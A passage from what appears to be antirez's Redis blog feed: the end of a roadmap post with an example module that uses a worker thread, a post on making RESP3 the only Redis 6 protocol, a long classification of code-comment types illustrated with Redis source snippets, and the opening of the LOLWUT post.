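    return RedisModule_ReplyWithLongLong(ctx,*res);
}

int Slow_Timeout(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    REDISMODULE_NOT_USED(argv);
    REDISMODULE_NOT_USED(argc);
    return RedisModule_ReplyWithError(ctx,"ERR timeout reached");
}

void Slow_FreeData(RedisModuleCtx *ctx, void *privdata) {
    REDISMODULE_NOT_USED(ctx);
    RedisModule_Free(privdata);
}

/* Worker thread: it can take all the time it wants, but it cannot
 * touch the shared dataset. That is exactly the limitation that the
 * planned key-level locking will remove. */
void *Slow_ThreadMain(void *arg) {
    RedisModuleBlockedClient *bc = arg;
    long long *res = RedisModule_Alloc(sizeof(*res));
    sleep(1);                          /* Stand-in for the slow work. */
    *res = 42;
    RedisModule_UnblockClient(bc,res); /* Schedules Slow_Reply(). */
    return NULL;
}

int Slow_Command(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    REDISMODULE_NOT_USED(argv);
    REDISMODULE_NOT_USED(argc);
    RedisModuleBlockedClient *bc = RedisModule_BlockClient(ctx,
        Slow_Reply,Slow_Timeout,Slow_FreeData,5000);
    pthread_t tid;
    if (pthread_create(&tid,NULL,Slow_ThreadMain,bc) != 0) {
        RedisModule_AbortBlock(bc);
        return RedisModule_ReplyWithError(ctx,"ERR can't start thread");
    }
    pthread_detach(tid);
    return REDISMODULE_OK;
}

int RedisModule_OnLoad(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    REDISMODULE_NOT_USED(argv);
    REDISMODULE_NOT_USED(argc);
    if (RedisModule_Init(ctx,"slowmod",1,REDISMODULE_APIVER_1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
    return RedisModule_CreateCommand(ctx,"slowmod.compute",Slow_Command,"",0,0,0);
}

While slowmod.compute sleeps, other clients are served normally: the client is unblocked from the worker thread, and the reply is generated back in the main thread.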

## Better persistence

Recently we made multiple efforts to improve these fundamental functions of Redis. One of the best things implemented lately is the RDB preamble inside the AOF file. A lot of work also went, both in Redis 4 and 5, into replication, which is now at a completely different level compared to what it used to be. And yes, improving these parts is still one of my main focuses.

## Data structures

Redis now has Streams, starting with Redis 5. For Redis 6 and 7 the plan is, to start, to make what we have much more memory efficient by changing the implementation of certain things. However, before adding new data structures there are a lot of considerations to make. It took me years to realize how to fill the gap, with streams, between lists, pub/sub and sorted sets, in the context of time series and streaming. I really want Redis to be a set of orthogonal data structures that the user can put together, and not a set of *tools* that are ready to use. Streams are an abstract log, so I think they are a very worthwhile addition. However, for other things, I'm not completely sure they deserve to be inside the core without very long consideration. Anyway, in recent years there has definitely been more emphasis on adding new data structures: HyperLogLogs, more advanced bit operations, blocking sorted set operations (ZPOP* and BZPOP*), and streams themselves are good examples.

## Conclusions

I believe the Redis community should be aware of why something is done and why something else is instead postponed. I make the mistake of communicating a lot via Twitter as if everybody were there, but many people happen to have a life :-D and don't care. The blog is a much better way to inform the community, and I need to take the time to blog more. Incidentally, I love writing posts, so it's a win-win. An important thing to realize is that Redis does not have a solid roadmap; over the years I found that opportunistic development is a huge win over having a roadmap. Is something demanded? Do I see the need? Am I in the mood to code it? Is it the right moment because there are no other huge priorities? Is there a set of users helping the design process, giving hints, ideas, testing stuff? Then it's the right moment, let's do it. Having a solid roadmap for Redis would be silly because the OSS core team is small, and sometimes I remain stuck on some random crash for weeks… Any fixed long term plan would not work. Moreover, as the Redis community gives feedback my ideas change a lot, so I would end up rewriting the roadmap every month. Yet blogging is a good solution to at least show the current version of the priorities and ideas, and to show why other ideas were abandoned.

A final note: the level of freedom I have with Redis Labs about what to put inside the open source side of the project is almost infinite. I think this is kind of a miracle in the industry; or maybe just that the people I work with at Redis Labs are nice folks who understand that what we are doing originated from the open source movement, and that it is wise to keep it going that way. But it's not a common thing. If there are errors in the Redis roadmap, they are surely my errors.
Why RESP3 will be the only protocol supported by Redis 6 http://antirez.com/news/125 Fri, 09 Nov 2018 15:31:10 +0000
[Update: a reader from Stack Overflow suggested that we could just switch protocols per-connection for backward compatibility, sending a command to enable RESP3. That means there is no longer a need for a global configuration switching the behavior of the server. Put that way, it is a lot more acceptable to me, and I'm reconsidering the essence of this blog post.]

A few weeks after the release of Redis 5, I'm here starting to implement RESP3, and after a few days of work it feels very good to see this finally happening. RESP3 is the new client-server protocol that Redis will use starting from Redis 6. The specification at https://github.com/antirez/resp3 should explain in clear terms how this evolution of our old protocol, RESP2, should improve the Redis ecosystem. But let's say that the most important thing is that RESP3 is more "semantic" than RESP2. For instance, it has the concept of maps, sets (unordered lists of elements), attributes of the returned data that may augment the reply with auxiliary information, and so forth. The final goal is to leave new Redis clients with less work to do for us: just decide a set of fixed rules in order to convert every RESP3 reply type to an appropriate type in the client library's programming language.

In the future of Redis I see clients that are smarter under the hood, trying to do their best to handle connections, pipelining, and state, and apparently much simpler on the user-facing side, to the point that the ideal Redis client is like:

result = redis.call("GET",keyname);

Of course on top of that you can build more advanced abstractions, but the bottom layer should look like that, and the returned reply should not require any filtering that is ad-hoc for specific commands: the RESP3 return type should contain enough information to produce an appropriate data type. So HGETALL will return a RESP3 "map", while LRANGE will return an "array", and EXISTS will return a RESP3 "boolean".
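
To visualize what "more semantic" means at the wire level, here is a sketch of such replies following the RESP3 draft specification (the hash content is invented for the example; every protocol line is terminated by CRLF):

HGETALL myhash, where myhash is {name: Sara, age: 30}, returns a map:

%2
$4
name
$4
Sara
$3
age
$2
30

EXISTS myhash returns a boolean:

#t

In RESP2 the same HGETALL reply is a flat array of four strings, and the client must know which command generated it in order to turn it into a hash; in RESP3 the "%" type marker alone is enough.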

This also allows new commands to work as expected even if the client library was not *specifically* designed to handle them. With RESP2, instead, what happened was that the command likely worked at first through mechanisms like "method missing" or similar, but later, when the command was *really* implemented in the client library, the returned type changed, introducing a subtle incompatibility.

However, while the new protocol is an incremental improvement over the old one, it will introduce breaking incompatibilities on the client-library side (of course) and *in the application layer* as well. For instance, ZSCORE will now return a double, and not a string, so application code should be updated; alternatively, client libraries could implement a compatibility option that turns the RESP3 replies back into their original RESP2 types.

Lua scripts will also no longer work if not modified for the new protocol, because Lua too will see more semantic types returned by the redis.call() command. Similarly, Lua will be able to return all the new data types introduced in RESP3.

Because of all that, people are scared about my decision: I’m going to ship Redis 6 with support for *only* RESP3. There will be no compatibility mode to switch a Redis 6 server to RESP2, so you either upgrade your client library and upgrade your application (or use the client library backward compatibility mode), or you cannot switch to Redis 6.

I have good reasons to do so, and I want to explain why I'm taking this decision, and how I'm mitigating the problems for users and client library authors. Let's start from the mitigations:

* Redis 5 will be fully supported for 2 years after the release of Redis 6. Everything critical will be back-ported to Redis 5 and patch-level releases will be available constantly.

* Redis 6 is expected to be released in about 1 or 1.5 years. However, Redis 6 will be switched to RESP3 in about 1 month. So people will use, experiment with, and deal with an unstable Redis version that uses the new protocol for a long time. Given that, unlike many other software projects, Redis unstable has a lot of casual users, both because it's the default branch on GitHub and because traditionally Redis unstable is never really that unstable, this will grant a lot of prior exposure.

* I'm still not 100% sure about this, but the Lua scripting engine may have a compatibility mode in order to return the same types as Redis 5. The compatibility mode, however, will not be enabled by default, and will be opt-in for each executed script, by calling a special redis.resp2_compat() function before calling Redis commands. So every Redis 6 server will behave the same regardless of its configuration, as Redis always did in the last 10 years.

Those are the mitigations. And this is, instead, why I’ll not have Redis 6 supporting both versions:

1) It is more or less completely useless. If people switch Redis 6 to RESP2 mode, they are still in the past, just waiting for Redis 7 to come out without RESP2 support and break everything. In the meantime, when you deal with a Redis 6 installation, you never know *what it replies*, depending on how it is configured. So the same client library may return a Hash or an Array for the same command.

2) It’s more work and more complexity without a good reason (see “1”). Many commands will require a check for the old protocol in order to see in what format to reply.

3) By binding the new Redis 6 features together with a protocol change, we are giving good reasons to users to do the switch and port their clients and applications. At some point everything will be over and we can focus on new things. Otherwise we’ll have a set of Redis 6 users that switched to the new server for the new features but are still with the old protocol, and Redis 7 will be the same drama again.

4) If somebody tells you that adapting the client libraries is a terrible amount of work, well, I beg to differ. Yes, there are some changes to make, but now that I'm implementing the server side, I see that it's not so terrible. What is terrible, instead, is that most client work is not paid at all and happens just out of passion and willingness to share with others. I bet we'll see many implementations of RESP3 in a short time.

5) RESP3 is designed so that clients can automatically detect if it’s RESP2 or RESP3, and switch, so new clients will work both with Redis <= 5 and Redis 6.
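
For instance, the detection can happen with a handshake command sent when the connection is created, along the lines of what the RESP3 specification draft describes (sketched here; see the spec for the exact details):

> HELLO 3

A server supporting RESP3 replies with a map of server properties and switches the connection to the new protocol; an older server replies with an error, and the client simply continues with RESP2.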

Well, that's all. I hope this clarifies my point of view and the reasons behind it, and that the mitigations enabled during the protocol switch may convince users that it will not be a very "hard" breakage.
Writing system software: code comments. http://antirez.com/news/124 Sat, 06 Oct 2018 20:08:58 +0000
Not everybody thinks likewise. Many believe that comments are useless if the code is solid enough. The idea is that when everything is well designed, the code itself documents what the code is doing, hence code comments are superfluous. I disagree with that vision for two main reasons:

1. Many comments don't explain what the code is doing. They explain what you can't understand just from what the code does. Often this missing information is *why* the code is doing a certain action, or why it’s doing something that is clear instead of something else that would feel more natural.

2. While it is not generally useful to document, line by line, what the code is doing, because it is understandable just by reading it, a key goal in writing readable code is to lower the amount of effort and the number of details the reader has to keep in his or her head while reading it. So comments can be, for me, a tool for lowering the cognitive load of the reader.

The following code snippet is a good example of the second point above. Note that all the code snippets in this blog post are obtained from the Redis source code. Every code snippet is presented prefixed by the file name it was extracted from. The branch used is the current "unstable" with hash 32e0d237.

scripting.c:
/* Initial Stack: array */
lua_getglobal(lua,"table");
lua_pushstring(lua,"sort");
lua_gettable(lua,-2); /* Stack: array, table, table.sort */
lua_pushvalue(lua,-3); /* Stack: array, table, table.sort, array */
if (lua_pcall(lua,1,0,0)) {
    /* Stack: array, table, error */

    /* We are not interested in the error, we assume that the problem is
     * that there are 'false' elements inside the array, so we try
     * again with a slower function but able to handle this case, that
     * is: table.sort(table, __redis__compare_helper) */
    lua_pop(lua,1); /* Stack: array, table */
    lua_pushstring(lua,"sort"); /* Stack: array, table, sort */
    lua_gettable(lua,-2); /* Stack: array, table, table.sort */
    lua_pushvalue(lua,-3); /* Stack: array, table, table.sort, array */
    lua_getglobal(lua,"__redis__compare_helper");
    /* Stack: array, table, table.sort, array, __redis__compare_helper */
    lua_call(lua,2,0);
}

Lua uses a stack based API. A reader following each call in the function above, with a Lua API reference at hand, would be able to mentally reconstruct the stack layout at any given moment. But why force the reader to make such an effort? While writing the code, the original author had to make that mental effort anyway. What I did there was just to annotate every line with the stack layout after every call. Reading this code is now trivial, regardless of the fact that the Lua API is otherwise non-trivial to follow.

My goal here is not just to offer my point of view on the usefulness of comments as a tool to provide background that is not clearly available by reading a local section of the source code, but also to provide some evidence about the usefulness of the kinds of comments that are historically considered useless or even dangerous, that is, comments stating *what* the code is doing, and not why.

# Classification of comments

The way I started this work was by reading random parts of the Redis source code, to check if and why comments were useful in different contexts. What quickly emerged was that comments are useful for very different reasons, since they tend to be very different in function, writing style, length and update frequency. I eventually turned the work into a classification task.

During my research I identified nine types of comments:

* Function comments
* Design comments
* Why comments
* Teacher comments
* Checklist comments
* Guide comments
* Trivial comments
* Debt comments
* Backup comments

The first six are, in my opinion, mostly very positive forms of commenting, while the final three are somewhat questionable. In the next sections each type will be analyzed with examples from the Redis source code.

FUNCTION COMMENTS

The goal of a function comment is to prevent the reader from reading code in the first place. Instead, after reading the comment, it should be possible to consider some code as a black box that obeys certain rules. Normally function comments are at the top of function definitions, but they may be in other places, documenting classes, macros, or other functionally isolated blocks of code that define some interface.

rax.c:

/* Seek the greatest key in the subtree at the current node. Return 0 on
* out of memory, otherwise 1. This is an helper function for different
* iteration functions below. */
int raxSeekGreatest(raxIterator *it) {
...

Function comments are actually a form of in-line API documentation. If the function comment is written well enough, the user should be able, most of the time, to jump back to what she was reading (the code calling the API) without having to read the implementation of a function, a class, a macro, or whatever.

Among all the kinds of comments, these are the ones most widely accepted as needed by the programming community at large. The only point to analyze is whether it is a good idea to place comments that are largely API reference documentation inside the code itself. For me the answer is simple: I want the API documentation to exactly match the code. As the code changes, the documentation should change with it. For this reason, by using function comments as a prologue of functions or other elements, we keep the API documentation close to the code, accomplishing three results:

* As the code is changed, the documentation can be easily changed at the same time, without the risk of making the API reference stale.

* This approach maximizes the probability that the author of the change, that should be the one better understanding the change, will also be the author of the API documentation change.

* While reading the code, it is handy to find the documentation of functions or methods directly where they are defined, so that the reader can focus solely on the code, instead of context switching between code and documentation.

DESIGN COMMENTS

While a "function comment" is usually located at the start of a function, a design comment is more often located at the start of a file. The design comment basically states how and why a given piece of code uses certain algorithms, techniques, tricks, and implementations. It is a higher level overview of what you'll see implemented in the code. With such background, reading the code will be simpler. Moreover, I tend to trust code more when I can find design notes. At least I know that some kind of explicit design phase happened, at some point, during the development process.

In my experience design comments are also very useful in order to state, in case the solution proposed by the implementation looks a bit too trivial, what were the competing solutions and why a very simple solution was considered to be enough for the case at hand. If the design is correct, the reader will convince herself that the solution is appropriate and that such simplicity comes from a process, not from being lazy or only knowing how to code basic things.

bio.c:
* DESIGN
* ------
*
* The design is trivial, we have a structure representing a job to perform
* and a different thread and job queue for every job type.
* Every thread waits for new jobs in its queue, and process every job
* sequentially.
...

WHY COMMENTS

Why comments explain the reason why the code is doing something, even if what the code is doing is crystal clear. See the following example from the Redis replication code.

replication.c:

if (idle > server.repl_backlog_time_limit) {
    /* When we free the backlog, we always use a new
     * replication ID and clear the ID2. This is needed
     * because when there is no backlog, the master_repl_offset
     * is not updated, but we would still retain our replication
     * ID, leading to the following problem:
     *
     * 1. We are a master instance.
     * 2. Our replica is promoted to master. It's repl-id-2 will
     *    be the same as our repl-id.
     * 3. We, yet as master, receive some updates, that will not
     *    increment the master_repl_offset.
     * 4. Later we are turned into a replica, connect to the new
     *    master that will accept our PSYNC request by second
     *    replication ID, but there will be data inconsistency
     *    because we received writes. */
    changeReplicationId();
    clearReplicationId2();
    freeReplicationBacklog();
    serverLog(LL_NOTICE,
        "Replication backlog freed after %d seconds "
        "without connected replicas.",
        (int) server.repl_backlog_time_limit);
}

If I check just the function calls, there is very little to wonder about: if a timeout is reached, change the main replication ID, clear the secondary ID, and finally free the replication backlog. However, what is not exactly clear is why we need to change the replication IDs when freeing the backlog.

Now, this is the kind of thing that happens continuously in software once it has reached a given level of complexity. Regardless of the code involved, the replication protocol has some complexity of its own, so we need to do certain things in order to make sure that other bad things can't happen. Probably these kinds of comments are, in some way, opportunities to reason about the system and check whether it could be improved, so that such complexity is no longer needed, and the comment can be removed as well. However, often making something simpler makes something else harder, or is simply not viable, or requires future work that breaks backward compatibility.

Here is another one.

replication.c:

/* SYNC can't be issued when the server has pending data to send to
 * the client about already issued commands. We need a fresh reply
 * buffer registering the differences between the BGSAVE and the current
 * dataset, so that we can copy to other replicas if needed. */
if (clientHasPendingReplies(c)) {
    addReplyError(c,"SYNC and PSYNC are invalid with pending output");
    return;
}

If you run SYNC while there is still pending output (from a past command) to send to the client, the command should fail, because during the replication handshake the output buffer of the client is used to accumulate changes, and may later be duplicated to serve other replicas connecting while we are already creating the RDB file for the full sync with the first replica. That is why we do it. What we do is trivial: pending replies? Emit an error. The why is rather obscure without the comment.

One may think that such comments are needed only when describing complex protocols and interactions, like in the case of replication. Is that the case? Let's completely change file and goals, and we still see such comments everywhere.

expire.c:

for (j = 0; j < dbs_per_call && timelimit_exit == 0; j++) {
    int expired;
    redisDb *db = server.db+(current_db % server.dbnum);

    /* Increment the DB now so we are sure if we run out of time
     * in the current DB we'll restart from the next. This allows to
     * distribute the time evenly across DBs. */
    current_db++;
    ...

That's an interesting one. We want to expire keys from different DBs, as long as we have some time. However, instead of incrementing the "database ID" to process at the end of the loop handling the current database, we do it differently: we select the current DB into the `db` variable, but then we immediately increment the ID of the next database to process (at the next call of this function). This way, if the function terminates because too much effort was spent in a single call, we don't have the problem of restarting from the same database again, letting logically expired keys accumulate in the other databases while we are too focused on processing the same database again and again.

With such a comment we both explain why we increment at that stage, and signal that the next person modifying the code should preserve this property. Note that without the comment the code looks completely harmless. Select, increment, go do some work. There is no evident reason not to relocate the increment to the end of the loop, where it could look more natural.

Trivia: the increment was indeed at the end of the loop in the original code. It was moved during a fix; at the same time, the comment was added. So let's say this is kind of a "regression comment".

TEACHER COMMENTS

Teacher comments don't try to explain the code itself, or certain side effects we should be aware of. They teach instead the *domain* (for example math, computer graphics, networking, statistics, complex data structures) in which the code is operating, which may be outside the reader's skill set, or simply too full of details to recall from memory.

The LOLWUT command in version 5 needs to display rotated squares on the screen (http://antirez.com/news/123). In order to do so it uses some basic trigonometry: despite the fact that the math used is simple, many programmers reading the Redis source code may not have any math background, so the comment at the top of the function explains what's going to happen inside the function itself.

lolwut5.c:

/* Draw a square centered at the specified x,y coordinates, with the specified
* rotation angle and size. In order to write a rotated square, we use the
* trivial fact that the parametric equation:
*
* x = sin(k)
* y = cos(k)
*
* Describes a circle for values going from 0 to 2*PI. So basically if we start
* at 45 degrees, that is k = PI/4, with the first point, and then we find
* the other three points incrementing K by PI/2 (90 degrees), we'll have the
* points of the square. In order to rotate the square, we just start with
* k = PI/4 + rotation_angle, and we are done.
*
* Of course the vanilla equations above will describe the square inside a
* circle of radius 1, so in order to draw larger squares we'll have to
* multiply the obtained coordinates, and then translate them. However this
* is much simpler than implementing the abstract concept of 2D shape and then
* performing the rotation/translation transformation, so for LOLWUT it's
* a good approach. */

The comment does not contain anything that is related to the code of the function itself, or its side effects, or the technical details related to the function. The description is only limited to the mathematical concept that is used inside the function in order to reach a given goal.

I think teacher comments are of huge value. They teach something the reader may not be aware of, or at least provide a starting point for further investigation. But this in turn means that a teacher comment increases the number of programmers that can read some code path: writing code that can be read by many programmers is a major goal of mine. There are developers that may not have math skills but are very solid programmers, able to contribute some wonderful fix or optimization. And in general, code should be read as well as executed, since it is written by humans for other humans.

There are cases where teacher comments are almost impossible to avoid if you want to write decent code. A good example is the Redis radix tree implementation. Radix trees are intricate data structures. The Redis implementation re-states the whole data structure theory as it implements it, showing the different cases and what the algorithm does to merge or split nodes and so forth. Immediately after each section of comments, we have the code implementing what was just described. After months of not touching the file implementing the radix tree, I was able to open it, fix a bug in a few minutes, and continue doing something else. There is no need to study again how a radix tree works, since the explanation and the code are one and the same, all mixed together.

The comments are too long, so I'll just show certain snippets.

rax.c:

/* If the node we stopped at is a compressed node, we need to
* split it before to continue.
*
* Splitting a compressed node have a few possible cases.
* Imagine that the node 'h' we are currently at is a compressed
* node containing the string "ANNIBALE" (it means that it represents
* nodes A -> N -> N -> I -> B -> A -> L -> E with the only child
* pointer of this node pointing at the 'E' node, because remember that
* we have characters at the edges of the graph, not inside the nodes
* themselves).
*
* In order to show a real case imagine our node to also point to
* another compressed node, that finally points at the node without
* children, representing 'O':
*
* "ANNIBALE" -> "SCO" -> []

... snip ...

* 3a. IF $SPLITPOS == 0:
* Replace the old node with the split node, by copying the auxiliary
* data if any. Fix parent's reference. Free old node eventually
* (we still need its data for the next steps of the algorithm).
*
* 3b. IF $SPLITPOS != 0:
* Trim the compressed node (reallocating it as well) in order to
* contain $splitpos characters. Change child pointer in order to link
* to the split node. If new compressed node len is just 1, set
* iscompr to 0 (layout is the same). Fix parent's reference.

... snip ...

if (j == 0) {
    /* 3a: Replace the old node with the split node. */
    if (h->iskey) {
        void *ndata = raxGetData(h);
        raxSetData(splitnode,ndata);
    }
    memcpy(parentlink,&splitnode,sizeof(splitnode));
} else {
    /* 3b: Trim the compressed node. */
    trimmed->size = j;
    memcpy(trimmed->data,h->data,j);
    trimmed->iscompr = j > 1 ? 1 : 0;
    trimmed->iskey = h->iskey;
    trimmed->isnull = h->isnull;
    if (h->iskey && !h->isnull) {
        void *ndata = raxGetData(h);
        raxSetData(trimmed,ndata);
    }
    raxNode **cp = raxNodeLastChildPtr(trimmed);
    ...

As you can see, the description in the comment is matched by the same labels in the code. It's hard to show it all in this form, so if you want to get the whole idea just check the full file at:

https://github.com/antirez/redis/blob/unstable/src/rax.c

This level of commenting is not needed for everything, but things like radix trees are really full of little details and corner cases. They are hard to recall, and certain details are *specific* to a given implementation. Doing this for a linked list does not make much sense of course. It's a matter of personal sensibility to understand when it's worth it or not.

CHECKLIST COMMENTS

This is a very common and odd one: sometimes, because of language limitations, design issues, or simply because of the natural complexity arising in systems, it is not possible to centralize a given concept or interface in one place, so there are places in the code that tell you to remember to do things in some other part of the code. The general concept is:

/* Warning: if you add a type ID here, make sure to modify the
* function getTypeNameByID() as well. */

In a perfect world this should never be needed, but in practice sometimes there is no escape from it. For example, Redis types could be represented using an "object type" structure, and every object could link to the type it belongs to, so you could do:

printf("Type is %s\n", myobject->type->name);

But guess what? It's too expensive for us, because a Redis object is represented like this:

typedef struct redisObject {
    unsigned type:4;
    unsigned encoding:4;
    unsigned lru:LRU_BITS; /* LRU time (relative to global lru_clock) or
                            * LFU data (least significant 8 bits frequency
                            * and most significant 16 bits access time). */
    int refcount;
    void *ptr;
} robj;

We use 4 bits instead of 64 to represent the type. This is just to show why sometimes things are not as centralized and natural as they could be. When the situation is like that, what helps is defensive commenting: making sure that if a given code section is touched, the reader is reminded to modify other parts of the code as well (a concrete sketch follows the list below). Specifically, a checklist comment does one or both of the following things:

* It tells you a set of actions to do when something is modified.

* It warns you about the way certain changes should be made.
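
To make the type ID example above concrete, here is a sketch of what a function like getTypeNameByID() could look like (the name comes from the warning comment above; the body and the enum are invented for the example, mirroring the real OBJ_* type flags defined in the Redis core):

enum objtype { OBJ_STRING, OBJ_LIST, OBJ_SET, OBJ_ZSET, OBJ_HASH };

const char *getTypeNameByID(int type) {
    switch(type) {
    case OBJ_STRING: return "string";
    case OBJ_LIST: return "list";
    case OBJ_SET: return "set";
    case OBJ_ZSET: return "zset";
    case OBJ_HASH: return "hash";
    default: return "unknown"; /* Added a new type and forgot this? */
    }
}

Since the object header stores only a 4-bit type ID, and not a pointer to a type descriptor, this mapping must live in a separate function, and the checklist comment is what keeps the two places in sync.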

Another example in blocked.c, when a new blocking type is introduced.

blocked.c:

* When implementing a new type of blocking operation, the implementation
* should modify unblockClient() and replyToBlockedClientTimedOut() in order
* to handle the btype-specific behavior of these two functions.
* If the blocking operation waits for certain keys to change state, the
* clusterRedirectBlockedClientIfNeeded() function should also be updated.

The checklist comment is also useful in a context similar to where certain "why comments" are used: when it is not obvious why some code must be executed at a given place, after or before something else. But while the why comment may tell you why a statement is there, the checklist comment, used in the same case, is more biased towards telling you what rules to follow if you want to modify the code (in this case the rule is: follow a given ordering) without breaking its behavior.

cluster.c:

/* Update our info about served slots.
*
* Note: this MUST happen after we update the master/replica state
* so that CLUSTER_NODE_MASTER flag will be set. */

Checklist comments are very common inside the Linux kernel, where the order of certain operations is extremely important.

GUIDE COMMENTS

I abuse guide comments to such a level that probably the majority of comments in Redis are guide comments. Moreover, guide comments are exactly what most people believe to be completely useless comments.

* They don't state what is not clear from the code.

* There are no design hints in guide comments.

Guide comments do a single thing: they babysit the reader, assisting him or her in processing what is written in the source code, by providing clear divisions, rhythm, and an introduction to what is coming next.

Guide comments’ sole reason to exist is to lower the cognitive load of the programmer reading some code.

rax.c:

/* Call the node callback if any, and replace the node pointer
 * if the callback returns true. */
if (it->node_cb && it->node_cb(&it->node))
    memcpy(cp,&it->node,sizeof(it->node));

/* For "next" step, stop every time we find a key along the
 * way, since the key is lexicographically smaller compared to
 * what follows in the sub-children. */
if (it->node->iskey) {
    it->data = raxGetData(it->node);
    return 1;
}

The comments are adding nothing to the code above: the guide comments will just assist you while reading it, and moreover confirm that you are understanding it right. More examples follow.

networking.c:

/* Log link disconnection with replica */
if ((c->flags & CLIENT_SLAVE) && !(c->flags & CLIENT_MONITOR)) {
    serverLog(LL_WARNING,"Connection with replica %s lost.",
        replicationGetSlaveName(c));
}

/* Free the query buffer */
sdsfree(c->querybuf);
sdsfree(c->pending_querybuf);
c->querybuf = NULL;

/* Deallocate structures used to block on blocking ops. */
if (c->flags & CLIENT_BLOCKED) unblockClient(c);
dictRelease(c->bpop.keys);

/* UNWATCH all the keys */
unwatchAllKeys(c);
listRelease(c->watched_keys);

/* Unsubscribe from all the pubsub channels */
pubsubUnsubscribeAllChannels(c,0);
pubsubUnsubscribeAllPatterns(c,0);
dictRelease(c->pubsub_channels);
listRelease(c->pubsub_patterns);

/* Free data structures. */
listRelease(c->reply);
freeClientArgv(c);

/* Unlink the client: this will close the socket, remove the I/O
 * handlers, and remove references of the client from different
 * places where active clients may be referenced. */
unlinkClient(c);

Redis is *literally* riddled with guide comments, so basically every file you open will contain plenty of them. Why bother? Of all the comment types I analyzed so far in this blog post, I'll admit this is absolutely the most subjective one. I don't regard code without such comments as less good, yet I firmly believe that if people find the Redis code readable, part of the reason is all the guide comments.

Guide comments have uses beyond the stated ones. Since they clearly divide the code into isolated sections, an addition to the code is very likely to be inserted into the appropriate section, instead of ending up in some random part. Having related statements nearby is a big readability win.

Also, check the guide comment above the point where the unlinkClient() function is called. The comment briefly tells the reader what the function is going to do, avoiding the need to jump into the function if you are only interested in the big picture.

TRIVIAL COMMENTS

Guide comments are very subjective tools. You may like them or not. I love them. However, a guide comment can degenerate into a very bad comment: it can easily turn into a "trivial comment". A trivial comment is a guide comment where the cognitive load of reading the comment is the same or higher than the load of just reading the associated code. The following form of trivial comment is exactly what many books will tell you to avoid.

array_len++; /* Increment the length of our array. */

So if you write guide comments, make sure you avoid writing trivial ones.

DEBT COMMENTS

Debt comments are technical debt statements hard coded inside the source code itself:

t_stream.c:

/* Here we should perform garbage collection in case at this point
 * there are too many entries deleted inside the listpack. */
entries -= to_delete;
marked_deleted += to_delete;
if (entries + marked_deleted > 10 && marked_deleted > entries/2) {
    /* TODO: perform a garbage collection. */
}

The snippet above is extracted from the Redis streams implementation. Redis streams allow deleting elements from the middle using the XDEL command. This may be useful in different contexts, especially where privacy regulations mean certain data cannot be retained no matter what data structure or system you are using to store it. It is a very odd use case for a mostly append-only data structure, but if users start deleting more than 50% of the items in the middle, the stream starts to fragment. Streams are composed of "macro nodes": entries are just flagged as deleted, and are only reclaimed once all the entries in a given macro node are freed. So mass deletions will change the memory behavior of streams.

Right now this looks like a non-issue, since I don't expect users to delete most of the history in a stream. However, it is possible that in the future we may want to introduce garbage collection: a macro node could be compacted once the ratio between deleted and existing entries reaches a given level, and nearby nodes could be glued together after the garbage collection. I was kind of afraid that later I would no longer remember the entry points for the garbage collection, so I put TODO comments there, and even wrote down the trigger condition.

This is probably not great. A better idea would have been to write, in the design comment at the top of the file, why we are currently not performing GC, and what the entry points would be if we wanted to add it later.

FIXME, TODO, XXX, "This is a hack", are all forms of debt comments. They are not great in general. I try to avoid them, but it's not always possible, and sometimes, instead of forgetting about a problem forever, I prefer to put a note inside the source code. At least one should periodically grep for such comments and see whether it is possible to move the notes to a better place, or whether the problem is no longer relevant or can be fixed right away.

BACKUP COMMENTS

Finally, backup comments are the ones where the developer comments out older versions of some code block, or even a whole function, because she or he is unsure about the change made in the new one. What is puzzling is that this still happens now that we have Git. I guess people have an uneasy feeling about losing that code fragment, considered more sane or stable, in some years-old commit.

But source code is not for making backups. If you want to save an older version of a function or code part, your work is not finished and cannot be committed. Either make sure the new function is better than the old one, or keep the old one in your development tree until you are sure.

Backup comments end my classification. Let's attempt some conclusions.

# Comments as an analysis tool.

Comments are rubber duck debugging on steroids, except you are not talking with a rubber duck, but with the future reader of the code, which is more intimidating than a rubber duck, and can use Twitter. So in the process you really try to understand if what you are stating *is acceptable*, honorable, good enough. And if it is not, you make your homework, and come up with something more decent.

It is the same process that happens while writing documentation: the writer attempts to provide the gist of what a given piece of code does, what are the guarantees, the side effects. This is often a bug hunting opportunity. It is very easy while describing something to find that it has holes... You can't really describe it all because you are not sure about a given behavior: such behavior is just emerging from complexity, at random. You really don't want that, so you go back and fix it all. I find this a splendid reason to write comments.

# Writing good comments is harder than writing good code

You may think that writing comments is a lesser, less noble form of work. After all, you *can code*! However, consider this: code is a set of statements and function calls, or whatever your programming paradigm is. Sometimes such statements do not make much sense, honestly, if the code is not good. Comments, instead, always require some ongoing design process, and a deeper understanding of the code you are writing. On top of that, in order to write good comments, you have to develop your writing skills. The same writing skills will assist you in writing emails, documentation, design documents, blog posts, and commit messages.

I write code because I have an urgent sense to share and communicate more than anything else. Comments complement the code, assist it, describe our efforts, and after all I love writing them as much as I love writing the code itself.

(Thanks to Michel Martens for giving feedback during the writing of this blog post.)
LOLWUT: a piece of art inside a database command http://antirez.com/news/123 Wed, 12 Sep 2018 15:20:28 +0000
As I was changing the Redis source code to get rid of a specific word where possible, I started to think that, whatever my opinion about the work I was doing, I'm the kind of person that enjoys writing code that has no measurable technological effects. Replacing words is just annoying, even if, even there, there were a few worthwhile technological challenges. But there is some other kind of code that I believe has a quality called "hack value". It may not solve any technological problem, yet it's worth writing. Sometimes because the process of writing the code is, itself, rewarding. Other times because very technically advanced ideas are used to solve a useless problem. Sometimes code is just written for artistic reasons.

In some way, the Twitter discussion of the last few days, mostly uninformed, chaotic, heated, made me think that, at this point, we are very far from the first hackers of the 60s. As I get older I find it harder and harder to talk about technology from a hacking perspective, where there are no walls or pre-cooked ideas, and the limit is the exploration. For everything you say there is a best practice. For every idea there is a taboo. To this new setup I say LOLWUT, since I don't feel represented by it, nor does it represent hacking, at least in my vision. So the idea was to spend some technologically useless time in order to explore something of the 60s.

My attention went immediately to one of the computer art pieces I love the most: Schotter, by Georg Nees (https://en.wikipedia.org/wiki/Georg_Nees). With the help of a plotter and ALGOL programs, Nees explored writing programs that generate art using chaos (randomness) and repeating patterns. Schotter is remarkable because of the simplicity of the piece and the deep meaning the observer can find looking at it. Under a surface of total calm and order, disorder hides deep inside. Or, if you put it upside down, it becomes like the sea during a tempest: however impetuous the surface may look, the deep sea remains calm.

